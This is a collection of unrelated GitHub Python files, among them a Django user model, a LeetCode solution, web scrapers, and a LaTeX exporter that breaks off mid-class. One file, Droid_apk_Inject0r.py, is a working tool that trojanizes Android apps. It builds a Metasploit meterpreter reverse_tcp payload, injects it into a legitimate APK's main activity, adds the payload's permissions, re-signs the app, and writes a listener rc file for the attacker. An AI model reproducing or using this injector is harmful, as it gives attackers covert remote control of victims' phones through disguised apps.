dbb15fa1a63e4b59e44ada51fc7db08061e74114 | 5a9f5fd278bed94afac4d3db1e5e2853f135f390 | /usermgt/models.py | 85bbf55ef313bd0d7a3ebc0f37980526f10edfb7 | [] | no_license | bihanviranga/OpenIntra-backend | afed82a2e68d809c6f3cd3a116852cab1fbaf255 | a2740fab9e98b121d735cc40a300cfd0e163ad46 | refs/heads/main | 2023-02-12T11:59:15.507286 | 2020-12-21T18:00:03 | 2020-12-21T18:00:03 | 319,279,906 | 0 | 0 | null | 2020-12-07T10:14:35 | 2020-12-07T10:14:34 | null | UTF-8 | Python | false | false | 817 | py | from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
"""
Inherited fields from AbstractUser:
username
password
first_name
last_name
email
date_joined
"""
email = models.EmailField(unique=True)
role = models.CharField(max_length=100, blank=True, null=True)
department = models.CharField(max_length=100, blank=True, null=True)
extension = models.CharField(max_length=10, blank=True, null=True)
position = models.CharField(max_length=100, blank=True, null=True)
# use the email field to login
USERNAME_FIELD = 'email'
# by default, USERNAME_FIELD and password is required
REQUIRED_FIELDS = ['username',]
def __str__(self):
return "{}".format(self.email)
| [
"bihanviranga@gmail.com"
] | bihanviranga@gmail.com |
2d10cde0506e07624d53ef566dd4a4a1997f78ca | 93d02a345c18508561284c65382b1388a8aac1bf | /Droid_apk_Inject0r.py | 4007e55e66b4376c256add164a1b3ced49307233 | [] | no_license | TH4X-Y/Droid_Inject0r | 5148e1422a595b434318efc4f9e937555246d8cb | 206fc97fcb577214cd3c96a8d2b9a8a766c77b84 | refs/heads/master | 2021-09-06T10:25:55.594246 | 2018-02-05T14:33:56 | 2018-02-05T14:33:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,601 | py | #!/usr/bin/env python2
''' Python Script .. inject malicious apk file into original apk [Created by : @Y4SS3R005]'''
try:
import os,sys
import subprocess
from pwn import log
from time import sleep
from xml.dom import minidom
from argparse import ArgumentParser
except ImportError as e:
raise e
try:
raw_input = input
except NameError:
pass
DN = open(os.devnull,mode='w')
class Fore:
BOLD = "\033[1m"
UNDE = "\033[4m"
GREEN = "\033[92m"
BLUE = "\033[94m"
YELLOW = "\033[93m"
RED = "\033[91m"
WHITE = "\033[0m"
CYAN = "\033[0;36m"
def banner():
print('''
,------. ,--. ,--. ,--. ,--. ,--. ,--.
| .-. \ ,--.--. ,---. `--' ,-| | | |,--,--, `--' ,---. ,---.,-' '-. / \ ,--.--.
| | \ :| .--'| .-. |,--.' .-. | | || \ ,--.| .-. :| .--''-. .-'| () || .--'
| '--' /| | ' '-' '| |\ `-' | | || || | | |\ --.\ `--. | | \ / | |
`-------' `--' `---' `--' `---' `--'`--''--'.-' / `----' `---' `--' `--' `--'
'---' Created by : @'''+Fore.GREEN+'''Y4SS3R005'''+Fore.WHITE+'''
''')
def parser_error(errmsg):
print(Fore.YELLOW+"\nUsage:"+Fore.WHITE+" python " + sys.argv[0] + " -p [PAYLOAD] --lhost=[LHOST] --lport=[PORT] --apkfile=[APKFILE]")
print(Fore.RED+"\n\tError: "+Fore.YELLOW+errmsg +Fore.WHITE+'\n')
sys.exit()
def print_help():
print(Fore.YELLOW+"\nUsage:"+Fore.WHITE+" python " + sys.argv[0] + " -p [PAYLOAD] --lhost=[LHOST] --lport=[PORT] --apkfile=[APKFILE]")
print(Fore.WHITE+"\n\t<< "+Fore.YELLOW+"Coded by : "+Fore.GREEN+"Yasser Janah"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Facebook : "+Fore.GREEN+"https://facebook.com/yasserjanah19"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Twitter : "+Fore.GREEN+"https://twitter.com/Y4ss3rJ4n4h"+Fore.WHITE+" >>")
print(Fore.WHITE+"\t<< "+Fore.YELLOW+"Github : "+Fore.GREEN+"https://github.com/Y4SS3R005/"+Fore.WHITE+" >>\n")
print(Fore.WHITE+'\t-p , --payload\t\ta metasploit android payload (e.x android/meterpreter/reverse_tcp) (not required)')
print(Fore.WHITE+'\t-lh , --lhost\t\t The listen address (not required)')
print(Fore.WHITE+'\t-lp , --lport\t\t The listen port (default 4444)')
print(Fore.WHITE+'\t-ap , --apkfile\t\tpath of apk file (required!!)\n')
def Generate_payload(LHOST,LPORT,PAYLOAD):
cmd = ['msfvenom','-p',PAYLOAD,'LHOST='+LHOST,'LPORT='+LPORT,'-o','payload.apk']
proc = subprocess.Popen(cmd,stdout=DN,stderr=DN)
proc.wait()
if os.path.isfile('payload.apk'): return True
else: return False
class APK:
def __init__(self,apkfile,outputfile):
self.apkfile = apkfile
self.outputfile = outputfile
self.finalAPK = self.apkfile.replace('.apk','-final.apk')
self.dec_cmd = ['java','-jar','core/apktool.jar','d','-f','-o',self.outputfile,self.apkfile]
self.rec_cmd = ['java','-jar','core/apktool.jar','b','-f',self.outputfile,'-o',self.finalAPK]
self.sig_cmd = ['java','-jar','core/sign.jar',self.finalAPK,'--override']
def Decompile(self):
proc = subprocess.Popen(self.dec_cmd,stdout=DN,stderr=DN)
proc.wait()
if os.path.exists(self.outputfile): return True
else: return False
def Recompile(self):
proc = subprocess.Popen(self.rec_cmd,stdout=DN,stderr=DN)
proc.wait()
if os.path.isfile(self.finalAPK): return self.finalAPK
else: return False
def SignAPK(self):
proc = subprocess.Popen(self.sig_cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
proc.wait()
if not os.path.isfile(self.finalAPK): return False
else: return self.finalAPK
def Copy():
Copy_cmd = ['cp','-rf','PAYLOAD/smali/com/metasploit/','ORIGINAL/smali/com/']
proc = subprocess.Popen(Copy_cmd,stdout=DN,stderr=DN)
proc.wait()
return True
class Parser:
def AndroidManifest(self):
xmldoc = minidom.parse('ORIGINAL/AndroidManifest.xml')
itemlist = xmldoc.getElementsByTagName('activity')
ActivityPath = itemlist[0].attributes['android:name'].value
SmalifileName = ActivityPath.split('.')[-1]+'.smali'
ActivityPath = '/'.join(ActivityPath.split('.')[0:-1])
return ActivityPath , SmalifileName
class Inject:
def __init__(self,ActivityPath,SmalifileName):
self.ActivityPath = ActivityPath
self.SmalifileName = SmalifileName
self.ManActivity = ""
self.payload = ' invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V\n'
self.SMALI = 'ORIGINAL/smali/'+self.ActivityPath+os.sep+self.SmalifileName
self.CheckBefore = ';->onCreate(Landroid/os/Bundle;)V'
self.CheckAfter = 'Lcom/metasploit/stage/Payload'
def Inject_payload(self):
file = open(self.SMALI ,'r')
for item in file.readlines():
if self.CheckBefore in item:
self.ManActivity += item + self.payload
else : self.ManActivity += item
file.close()
file = open(self.SMALI ,'w')
file.write(self.ManActivity)
file.close()
Actfile = open(self.SMALI ,'r')
if self.CheckAfter in Actfile.read(): return True
else : return False
Actfile.close()
def GetPermissions():
Permissions = ""
PATHpayloadManifest = 'PAYLOAD/AndroidManifest.xml'
file = open(PATHpayloadManifest,'r')
for i in file.readlines():
if '<uses-permission android:name=' in i:
Permissions += i
file.close()
return Permissions
def AddPermissions(Permissions):
firstcheck = 0
AndroidManifest = ""
PATHAndroid = 'ORIGINAL/AndroidManifest.xml'
Check = '<uses-permission android:name='
file = open(PATHAndroid,'r')
for item in file.readlines():
if Check in item:
if firstcheck == 0:
AndroidManifest += item + Permissions
firstcheck += 1
else : AndroidManifest += item
file.close()
file = open(PATHAndroid,'w')
file.write(AndroidManifest)
file.close()
Festfile = open(PATHAndroid,'r')
if Permissions in Festfile.read(): return True
else : return False
Festfile.close()
def Create_rc_file(payload,lhost,lport):
rc_file = 'droid_apk.rc'
write = 'use exploit/multi/handler\nset PAYLOAD {0}\nset LHOST {1}\nset LPORT {2}\nset ExitOnSession false\nexploit -j\n'.format(payload,lhost,lport)
file = open(rc_file,mode='w')
file.write(write)
file.close()
def cleanup(apk):
cmd = ['rm','-rf','ORIGINAL','PAYLOAD','payload.apk']
subprocess.call(cmd)
def main():
parser = ArgumentParser()
parser.add_argument('-p','--payload')
parser.add_argument('-lh','--lhost')
parser.add_argument('-lp','--lport')
parser.add_argument('-ap','--apkfile',required=True)
parser.error = parser_error
parser.print_help = print_help
args = parser.parse_args()
banner()
if not args.payload:
log.info("payload not selected .. default "+Fore.YELLOW+"'"+Fore.WHITE+"android/meterpreter/reverse_tcp"+Fore.YELLOW+"'"+Fore.WHITE)
PAYLOAD = 'android/meterpreter/reverse_tcp'
else: PAYLOAD = args.payload
if not args.lhost:
LHOST = subprocess.check_output(['hostname','-I'])
LHOST = LHOST.decode('utf-8').strip()
if '.' in LHOST:
log.info("LHOST not selected .. using "+Fore.YELLOW+"'"+Fore.WHITE+LHOST+Fore.YELLOW+"'"+Fore.WHITE);
else: sys.exit(log.failure('error with lhost (please use --lhost=[IP])'))
else: LHOST = args.lhost
if not args.lport:LPORT='4444';log.info("LPORT not selected .. using "+Fore.YELLOW+"'"+Fore.WHITE+LPORT+Fore.YELLOW+"'"+Fore.WHITE)
else: LPORT = args.lport
if not os.path.isfile(args.apkfile): log.failure('apkfile not found');sys.exit(0)
else:pass
apkfile = (Fore.YELLOW+"'"+Fore.CYAN+args.apkfile+Fore.YELLOW+"'"+Fore.WHITE)
p = log.progress("Generating payload")
res = Generate_payload(LHOST,LPORT,PAYLOAD)
if res: p.success(Fore.GREEN+" Generated."+Fore.WHITE)
else: p.failure(Fore.RED+" not Generated."+Fore.WHITE);sys.exit(0)
p = log.progress("Decompling payload")
res = APK('payload.apk','PAYLOAD').Decompile()
if res: p.success(Fore.GREEN+" Decompiled."+Fore.WHITE)
else: p.failure(Fore.RED+" not Decompiled."+Fore.WHITE);sys.exit(0)
p = log.progress("Decompling "+apkfile)
res = APK(args.apkfile,'ORIGINAL').Decompile()
if res: p.success(Fore.GREEN+" Decompiled."+Fore.WHITE)
else: p.failure(Fore.RED+" not Decompiled."+Fore.WHITE);sys.exit(0)
sleep(2)
p = log.progress("Copying payload files into "+apkfile)
res = Copy()
if res: p.success(Fore.GREEN+" Done."+Fore.WHITE)
else: p.failure(Fore.RED+" copying error."+Fore.WHITE);sys.exit(0)
log.info('Parsing AndroidManifest file')
(activity , smali ) = Parser().AndroidManifest()
log.info("Activity PATH : "+Fore.YELLOW+"'"+Fore.BLUE+activity+Fore.YELLOW+"'"+Fore.WHITE)
log.info("SMALI File : "+Fore.YELLOW+"'"+Fore.BLUE+smali+Fore.YELLOW+"'")
p = log.progress("Injecting payload into "+apkfile)
res = Inject(activity,smali).Inject_payload()
if res: p.success(Fore.GREEN+" Injected."+Fore.WHITE)
else: p.failure(Fore.RED+" Injecting error."+Fore.WHITE);sys.exit(0)
p = log.progress('Get Permissions from payload AndroidManifest file')
Permissions = GetPermissions()
if '<uses-permission' in Permissions: p.success(Fore.GREEN+' Done.'+Fore.WHITE)
else: p.failure(Fore.RED+" Get 0 permissions."+Fore.WHITE);sys.exit(0)
sleep(1)
p = log.progress("Add Permissions into "+apkfile+" AndroidManifest file")
res = AddPermissions(Permissions)
if res: p.success(Fore.GREEN+" Permissions Added."+Fore.WHITE)
else: p.failure(Fore.RED+" Permissions not added."+Fore.WHITE);sys.exit(0)
sleep(1)
p = log.progress("Recompling "+apkfile)
readySIGN = APK(args.apkfile,'ORIGINAL').Recompile()
if readySIGN != False : p.success(Fore.GREEN+" Recompiled."+Fore.WHITE)
else : p.failure(Fore.RED+" error with recompiling "+apkfile+".");exit(0)
sleep(1)
p = log.progress("Signing "+apkfile)
finalAPK = APK(args.apkfile,'').SignAPK()
if finalAPK == False : p.failure(Fore.RED+" error with Signing "+apkfile+".");sys.exit(0)
else:
p.success(Fore.GREEN+" Signed."+Fore.WHITE)
print(Fore.CYAN+'\n[+]'+Fore.WHITE+" metasploit rc file : "+Fore.RED+"'"+Fore.YELLOW+os.getcwd()+os.sep+'droid_apk.rc'+Fore.RED+"'"+Fore.WHITE)
print(Fore.CYAN+"\n[+]"+Fore.WHITE+" final apk : "+Fore.RED+"'"+Fore.YELLOW+os.getcwd()+os.sep+args.apkfile.replace('.apk','-final.apk')+Fore.RED+"'\n"+Fore.WHITE)
cleanup(args.apkfile)
Create_rc_file(PAYLOAD,LHOST,LPORT)
if __name__ == '__main__':
try:
main()
except Exception as err:
print(err)
except KeyboardInterrupt:
print(Fore.RED+"[+]"+Fore.WHITE+" Exiting ..")
sleep(1)
| [
"noreply@github.com"
] | TH4X-Y.noreply@github.com |
cc2a881d553a0a3c1080c3d0507a4ed1361e3294 | f69262312c39583f9d95d4952bc3813019ab83d6 | /Python/easy/0645_set_mismatch.py | 56efed8d3f79161c7ee67167164d09dc1171c34d | [
"MIT"
] | permissive | CalmScout/LeetCode | 7de7159071780a09185d3e6d6f8fe57f1b11870f | 3e863c4e4029bd3e101af27754de1417293fd300 | refs/heads/master | 2022-12-20T21:48:14.467733 | 2022-12-14T16:03:49 | 2022-12-14T16:03:49 | 134,153,647 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | """
The set S originally contains numbers from 1 to n. But unfortunately, due to the data error,
one of the numbers in the set got duplicated to another number in the set, which results in
repetition of one number and loss of another number. Given an array nums representing the
data status of this set after the error. Your task is to firstly find the number occurs twice
and then find the number that is missing. Return them in the form of an array.
"""
from typing import List
from collections import Counter
class Solution:
def findErrorNums(self, nums: List[int]) -> List[int]:
orig = set(range(1, len(nums) + 1))
missed = orig.difference(set(nums)).pop()
counter = Counter(nums)
substitute = [el for el in counter if counter[el] == 2][0]
return [substitute, missed]
if __name__ == "__main__":
nums = [1, 2, 2, 4]
out = [2, 3]
res = Solution().findErrorNums(nums)
assert res == out, (res, out)
| [
"popovanton567@gmail.com"
] | popovanton567@gmail.com |
e9c6a490422bade7bff0ccdc363ca4f326b7f8bb | 55821cab06b431b3b253df77559800b9f84ed2a7 | /models/place.py | a918d531769a7e7fed34aacbe57ca9ec87ce9dab | [] | no_license | kaci65/AirBnB_clone | 1fa2f1721d752635dd895de09fcedc194612ca91 | b2c03583aab891fde5e87e7e34b40bcf2aa7ebb6 | refs/heads/main | 2023-03-11T08:23:08.811811 | 2021-02-28T20:41:17 | 2021-02-28T20:41:17 | 340,441,645 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 382 | py | #!/usr/bin/python3
"""Place module"""
import models
from models.base_model import BaseModel
class Place(BaseModel):
"""place class inheriting from BaseModel"""
city_id = ""
user_id = ""
name = ""
description = ""
number_rooms = 0
number_bathrooms = 0
max_guest = 0
price_by_night = 0
latitude = 0.0
longitude = 0.0
amenity_ids = ""
| [
"wanjikukarugi@gmail.com"
] | wanjikukarugi@gmail.com |
04c160f0b2359b01e9a2909241bf75c9ca9c4a3a | 5b4f1557c0eda22108cf22c399b8d08dceabe315 | /dags/etl_scripts/transfers_scraping_etl.py | cdaaf39953ba49dc3e66f1d771d50ac71a4b6eb6 | [] | no_license | leonardopanatta/transfermarkt-webscraper-airflow | 0121d512f6379c88bda6c7ad5b4e00ddae7ef95e | 7b0ad4613dfdc62d7a9e306f9865ca7889772764 | refs/heads/master | 2023-05-13T17:04:42.555721 | 2021-06-07T20:49:53 | 2021-06-07T20:49:53 | 371,493,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,685 | py | # -*- coding: utf-8 -*-
import glob
import os
import pandas as pd
import requests
import csv
import logging
from bs4 import BeautifulSoup
from pathlib import Path
from datetime import datetime
from airflow.hooks.S3_hook import S3Hook
class TransfersScrapingETL():
def __init__(self):
self.local_data_path = "./dags/data/"
self.s3 = S3Hook('aws_s3_airflow_user')
self.s3_bucket_name = "datalake-transfermarkt-sa-east-1"
self.s3_bucket_folder = "latest_transfers/"
self.s3_file_name_prefix = "transfers_"
self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
def get_land_id(self, country):
if country == "afghanistan":
return 1
elif country == "albania":
return 3
elif country == "andorra":
return 5
elif country == "angola":
return 6
elif country == "brazil":
return 26
elif country == "saudi_arabia":
return 146
elif country == "south_africa":
return 159
elif country == "usa":
return 184
elif country == "england":
return 189
else:
raise Exception(f"{country} is not a valid country.")
def scrape_latest_transfers(self, clubs_from_country):
land_id = self.get_land_id(clubs_from_country)
page_number = 1
url = f"https://www.transfermarkt.com.br/transfers/neuestetransfers/statistik/plus/plus/1/galerie/0/wettbewerb_id/alle/land_id/{land_id}/minMarktwert/0/maxMarktwert/500.000.000/yt0/Mostrar/page/{page_number}"
page_tree = requests.get(url, headers=self.headers)
soup = BeautifulSoup(page_tree.content, 'html.parser')
no_players = soup.select("div.responsive-table > div.grid-view > span.empty")
if not no_players:
players_names_list = []
players_positions_list = []
players_ages_list = []
players_first_nationalities_list = []
players_second_nationalities_list = []
clubs_left_list = []
clubs_left_nationalities_list = []
clubs_left_leagues_list = []
clubs_joined_list = []
clubs_joined_nationalities_list = []
clubs_joined_leagues_list = []
transfer_dates_list = []
market_values_at_time_list = []
transfer_fees_list = []
pager = soup.select("div.pager > ul > li")
number_of_pages = len(pager)
# adjust in case it has no pager tag
if number_of_pages == 0:
number_of_pages = 1
else:
number_of_pages = number_of_pages - 2
has_more_pages = True
while has_more_pages:
players_names = soup.select("table.items > tbody > tr > td:nth-of-type(1) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
players_positions = soup.select("table.items > tbody > tr > td:nth-of-type(1) > table > tr:nth-of-type(2) > td")
players_ages = soup.select("table.items > tbody > tr > td:nth-of-type(2)")
players_first_nationalities = []
players_second_nationalities = []
for player_nationality in soup.select("table.items > tbody > tr > td:nth-of-type(3)"):
player_first_nationality = player_nationality.select("td > img:nth-of-type(1)")
player_second_nationality = player_nationality.select("td > img:nth-of-type(2)")
players_first_nationalities.append(player_first_nationality[0].get("title"))
if player_second_nationality:
players_second_nationalities.append(player_second_nationality[0].get("title"))
else:
players_second_nationalities.append("")
clubs_left = soup.select("table.items > tbody > tr > td:nth-of-type(4) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
clubs_left_nationalities = []
clubs_left_leagues = []
for club_left in soup.select("table.items > tbody > tr > td:nth-of-type(4) > table > tr:nth-of-type(2)"):
club_left_nationality = club_left.select("td > img")
if club_left_nationality:
clubs_left_nationalities.append(club_left_nationality[0].get("title"))
else:
clubs_left_nationalities.append("")
club_left_league = club_left.select("td > a")
if club_left_league:
clubs_left_leagues.append(club_left_league[0].text)
else:
clubs_left_leagues.append("")
clubs_joined = soup.select("table.items > tbody > tr > td:nth-of-type(5) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
clubs_joined_nationalities = []
clubs_joined_leagues = []
for club_joined in soup.select("table.items > tbody > tr > td:nth-of-type(5) > table > tr:nth-of-type(2)"):
club_joined_nationality = club_joined.select("td > img")
if club_joined_nationality:
clubs_joined_nationalities.append(club_joined_nationality[0].get("title"))
else:
clubs_joined_nationalities.append("")
club_joined_league = club_joined.select("td > a")
if club_joined_league:
clubs_joined_leagues.append(club_joined_league[0].text)
else:
clubs_joined_leagues.append("")
transfer_dates = soup.select("table.items > tbody > tr > td:nth-of-type(6)")
market_values_at_time = soup.select("table.items > tbody > tr > td:nth-of-type(7)")
transfer_fees = soup.select("table.items > tbody > tr > td:nth-of-type(8)")
for i in range(len(players_names)):
players_names_list.append(players_names[i].text)
players_positions_list.append(players_positions[i].text)
players_ages_list.append(players_ages[i].text)
players_first_nationalities_list.append(players_first_nationalities[i])
players_second_nationalities_list.append(players_second_nationalities[i])
clubs_left_list.append(clubs_left[i].text)
clubs_left_nationalities_list.append(clubs_left_nationalities[i])
clubs_left_leagues_list.append(clubs_left_leagues[i])
clubs_joined_list.append(clubs_joined[i].text)
clubs_joined_nationalities_list.append(clubs_joined_nationalities[i])
clubs_joined_leagues_list.append(clubs_joined_leagues[i])
transfer_dates_list.append(transfer_dates[i].text)
market_values_at_time_list.append(market_values_at_time[i].text)
transfer_fees_list.append(transfer_fees[i].text)
page_number = page_number + 1
if page_number <= number_of_pages:
url = f"https://www.transfermarkt.com.br/transfers/neuestetransfers/statistik/plus/plus/1/galerie/0/wettbewerb_id/alle/land_id/{land_id}/minMarktwert/0/maxMarktwert/500.000.000/yt0/Mostrar/page/{page_number}"
page_tree = requests.get(url, headers=self.headers)
soup = BeautifulSoup(page_tree.content, 'html.parser')
else:
has_more_pages = False
df = pd.DataFrame({
"player_name":players_names_list,
"player_position":players_positions_list,
"player_age":players_ages_list,
"player_first_nationality":players_first_nationalities_list,
"player_second_nationality":players_second_nationalities_list,
"club_left":clubs_left_list,
"club_left_nationality":clubs_left_nationalities_list,
"club_left_league":clubs_left_leagues_list,
"club_joined":clubs_joined_list,
"club_joined_nationality":clubs_joined_nationalities_list,
"club_joined_league":clubs_joined_leagues_list,
"transfer_date":transfer_dates_list,
"market_value_at_time":market_values_at_time_list,
"transfer_fee":transfer_fees_list
})
file_name_prefix = "latest_transfers_" + clubs_from_country + "_"
self.write_to_CSV(df, file_name_prefix)
else:
logging.info(f"{clubs_from_country} had no transfers.")
def scrape_transfers(self):
url = "https://www.transfermarkt.com.br/transfers/saisontransfers/statistik/top/plus/1/galerie/0?saison_id=2020&transferfenster=alle&land_id=&ausrichtung=&spielerposition_id=&altersklasse=&leihe="
pageTree = requests.get(url, headers=self.headers)
soup = BeautifulSoup(pageTree.content, 'html.parser')
players_names = soup.select("table.items > tbody> tr > td:nth-of-type(2) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
players_positions = soup.select("table.items > tbody > tr > td:nth-of-type(2) > table > tr:nth-of-type(2) > td")
players_ages = soup.select("table.items > tbody > tr > td:nth-of-type(3)")
market_values_at_time = soup.select("table.items > tbody > tr > td:nth-of-type(4)")
players_first_nationalities = []
players_second_nationalities = []
for player_nationality in soup.select("table.items > tbody > tr > td:nth-of-type(5)"):
player_first_nationality = player_nationality.select("td > img:nth-of-type(1)")
player_second_nationality = player_nationality.select("td > img:nth-of-type(2)")
players_first_nationalities.append(player_first_nationality[0].get("title"))
if player_second_nationality:
players_second_nationalities.append(player_second_nationality[0].get("title"))
else:
players_second_nationalities.append("")
clubs_left = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
clubs_left_nationalities = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(2) > td > img")
clubs_left_leagues = soup.select("table.items > tbody > tr > td:nth-of-type(6) > table > tr:nth-of-type(2) > td > a")
clubs_joined = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(1) > td:nth-of-type(2) > a")
clubs_joined_nationalities = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(2) > td > img")
clubs_joined_leagues = soup.select("table.items > tbody > tr > td:nth-of-type(7) > table > tr:nth-of-type(2) > td > a")
fees = soup.select("table.items > tbody > tr > td:nth-of-type(8)")
players_names_list = []
players_positions_list = []
players_ages_list = []
market_values_at_time_list = []
seasons_list = []
players_first_nationalities_list = []
players_second_nationalities_list = []
clubs_left_list = []
clubs_left_nationalities_list = []
clubs_left_leagues_list = []
clubs_joined_list = []
clubs_joined_nationalities_list = []
clubs_joined_leagues_list = []
transfers_fees_list = []
for i in range(len(players_names)):
players_names_list.append(players_names[i].text)
players_positions_list.append(players_positions[i].text)
players_ages_list.append(players_ages[i].text)
market_values_at_time_list.append(market_values_at_time[i].text)
seasons_list.append("20/21")
players_first_nationalities_list.append(players_first_nationalities[i])
players_second_nationalities_list.append(players_second_nationalities[i])
clubs_left_list.append(clubs_left[i].text)
clubs_left_nationalities_list.append(clubs_left_nationalities[i].get("title"))
clubs_left_leagues_list.append(clubs_left_leagues[i].text)
clubs_joined_list.append(clubs_joined[i].text)
clubs_joined_nationalities_list.append(clubs_joined_nationalities[i].get("title"))
clubs_joined_leagues_list.append(clubs_joined_leagues[i].text)
transfers_fees_list.append(fees[i].text)
df = pd.DataFrame({
"player_name":players_names_list,
"player_position":players_positions_list,
"player_age":players_ages_list,
"market_value_at_time":market_values_at_time_list,
"season":seasons_list,
"player_first_nationality":players_first_nationalities_list,
"player_second_nationality":players_second_nationalities_list,
"club_left":clubs_left_list,
"club_left_nationality":clubs_left_nationalities_list,
"club_left_league":clubs_left_leagues_list,
"club_joined":clubs_joined_list,
"club_joined_nationality":clubs_joined_nationalities_list,
"club_joined_league":clubs_joined_leagues_list,
"transfer_fee":transfers_fees_list
})
file_name_prefix = "transfers_"
self.write_to_CSV(df, file_name_prefix)
def write_to_CSV(self, df, file_name_prefix):
output_dir = Path(self.local_data_path)
output_dir.mkdir(parents=True, exist_ok=True)
#file_name = self.s3_file_name_prefix + datetime.now().strftime("%Y_%m_%d_%H_%M_%S") + ".csv"
file_name = file_name_prefix + datetime.now().strftime("%Y_%m_%d") + ".csv"
file_path = self.local_data_path + file_name
df.to_csv(file_path, index = False, quoting=csv.QUOTE_NONNUMERIC)
def load_CSV_on_S3(self):
file_path_pattern = self.local_data_path + "*.csv"
for f in glob.glob(file_path_pattern):
key = self.s3_bucket_folder + f.split('/')[-1]
self.s3.load_file(filename=f, bucket_name=self.s3_bucket_name, replace=True, key=key)
def delete_local_CSV(self, filepath='./dags/data/*.csv'):
file_path_pattern = self.local_data_path + "*.csv"
files = glob.glob(file_path_pattern)
for f in files:
os.remove(f) | [
"leopanatta@gmail.com"
] | leopanatta@gmail.com |
d3ee2879bf5bdc43bc294030aaa16552cfce248e | d71fcc639bcf9d80233d0a58b351f94d81d37bc6 | /sspai.py | 075ac160d4c6aa5b475e1747c09911be9240d191 | [] | no_license | awesome-archive/sspai | 8ff20894c09ec327e6d96cea8ffc254baa7b0922 | 0f3533707fc9351cd55541da49610d7bddd75e15 | refs/heads/master | 2021-12-24T03:39:18.460968 | 2017-12-05T14:53:09 | 2017-12-05T14:53:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,400 | py | import time
import json
import os
import requests
from pymongo import MongoClient
base_url = 'https://sspai.com/api/v1/articles?offset={offset}&limit=10&type=recommend_to_home&sort=recommend_to_home_at&include_total=false'
false_url = 'https://sspai.com/api/v1/articles?offset=9980&limit=10&type=recommend_to_home&sort=recommend_to_home_at&include_total=false'
def get_html(url):
headers = {
'Content-Type': 'application/json; charset=utf-8',
'User-Agent': 'Paw/3.1.5 (Macintosh; OS X/10.12.6) GCDHTTPRequest',
}
req = requests.get(url, headers=headers)
return req.text
def parse_article_json(json_data, db):
"""
获取单页面文章列表数据:链接 标题
解析JSON数据,提取需要的字段:链接 标题
"""
result = json.loads(json_data)
for i in result.get('list'):
article_info = {
'article_url': 'https://sspai.com/post/{id}'.format(id=i.get('id')),
'article_title': i.get('title'),
}
if not isDataExist(article_info, db):
print('保存新数据')
saveData(article_info, db)
else:
print('数据已存在')
# with open('sspai_info.md', mode='a', encoding='utf-8') as fw:
# fw.write('* [ ] [{Title}]({Link}):{Tags}'.format(Title=article_info.get(
# 'article_title'), Link=article_info.get('article_url'), Tags='None') + os.linesep)
def initSQL():
"""
初始化数据库
"""
db_client = MongoClient('localhost', 27017)
return db_client.sspai
def saveData(data, db):
"""
保存数据到数据库
"""
db.ARTICLE_LIST.insert(data)
def isDataExist(data, db):
"""
判断数据库中是否已经存在data数据
"""
return db.ARTICLE_LIST.find({'article_url': data.get('article_url')}).count()
def deleteData(data, db):
"""
删除数据库中的data数据
"""
if isDataExist(data, db):
db.remove({'article_url': data.get('article_url')})
def generateMarkdown(db):
"""
从数据库中读取相应字段,生成Markdown文档
"""
client = MongoClient()
db = client.sspai
collection = db.ARTICLE_LIST
for article_info in collection.find():
with open('sspai_info.md', mode='a', encoding='utf-8') as fw:
fw.write('* [ ] [{Title}]({Link}):{Tags}'.format(Title=article_info.get(
'article_title'), Link=article_info.get('article_url'), Tags='None') + os.linesep)
def get_time(timestamp):
"""
功能:将Unix时间戳转换成时间
"""
# 转换成localtime
time_local = time.localtime(timestamp)
# 转换成新的时间格式(2016-05-05 20:28:54)
return time.strftime("%Y-%m-%d %H:%M:%S", time_local)
def get_all_article(db):
page_num = 0
while True:
# 循环遍历获取每一页文章列表信息
url = base_url.format(offset=page_num * 10)
json_data = get_html(url)
if len(json_data) <= 11:
print('错误页面:', page_num)
break
print('爬取第{}页'.format(page_num + 1))
parse_article_json(json_data, db)
page_num = page_num + 1
def main():
db = initSQL()
get_all_article(db)
def test():
json_data = get_html(false_url)
print(len(json_data))
if __name__ == '__main__':
main()
# test()
| [
"yan199219dang@gmail.com"
] | yan199219dang@gmail.com |
ba0bfd1f20f77d0b6b66bea68f6e18d7e70c9071 | a84f271df045516f516a1da4acc76eb9d61825b4 | /survey/exporter/tex/latex_file.py | a7ddc714199da7e2514d71d47e13fd207491c898 | [
"MIT"
] | permissive | TheWITProject/MentorApp | a28263791c78d3d5b680bf5b514d4b685442113c | 2f08b87a7cde6d180e16d6f37d0b8019b8361638 | refs/heads/master | 2022-11-23T22:44:29.237363 | 2020-05-24T16:25:27 | 2020-05-24T16:25:27 | 237,828,254 | 0 | 0 | MIT | 2022-11-22T05:54:06 | 2020-02-02T19:59:07 | Python | UTF-8 | Python | false | false | 2,071 | py | # -*- coding: utf-8 -*-
import logging
from builtins import open
from datetime import datetime
LOGGER = logging.getLogger(__name__)
class LatexFile:
""" Permit to handle the content of a LatexFile """
def __init__(self, document_class, document_option=None, header=None, intro=None, footer=None, date=None, **kwargs):
LOGGER.debug(
"Creating a document skeleton with document_class=%s, document_option=%s", document_class, document_option
)
self.document_class = document_class
self.text = ""
self.document_option = self.set_value(document_option)
self._header = self.set_value(header)
self.intro = self.set_value(intro)
self._footer = self.set_value(footer)
if date is None:
date = datetime.now().strftime("%B %d, %Y")
self.date = date
def set_value(self, value):
